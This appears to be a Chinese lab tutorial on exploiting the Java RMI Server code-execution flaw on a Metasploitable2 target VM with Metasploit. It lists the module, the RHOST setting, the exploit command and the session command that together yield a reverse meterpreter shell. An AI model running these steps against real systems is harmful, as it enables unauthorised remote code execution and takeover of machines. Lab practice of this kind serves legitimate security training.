Java RMI SERVER 命令执行漏洞
Java RMI Serve 的 RMI 注册表和 RMI **服务的默认配置存在安全漏洞,可被利用导致代码执行。

1.在kali中执行msfconsole,启动metasploit
2.use exploit/multi/misc/java_rmi_server,选择漏洞
3.set RHOST 192.168.175.130  设置要攻击的机器IP
4.exploit,开始攻击
5.利用成功,得到 meterpreter shell
注意:其他参数默认,不用修改,修改后可能会弹不出来目标靶机的 meterpreter shell
从metasploit2 linux靶机反弹meterpreter shell

从metasploit2 linux靶机反弹meterpreter shell

6.执行 sessions -i 2,即可进入meterpreter工具
从metasploit2 linux靶机反弹meterpreter shell

相关文章:

  • 2021-05-25
  • 2021-07-31
  • 2022-12-23
  • 2021-10-29
  • 2021-12-16
猜你喜欢
  • 2021-11-27
  • 2022-12-23
  • 2022-12-23
  • 2021-05-18
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案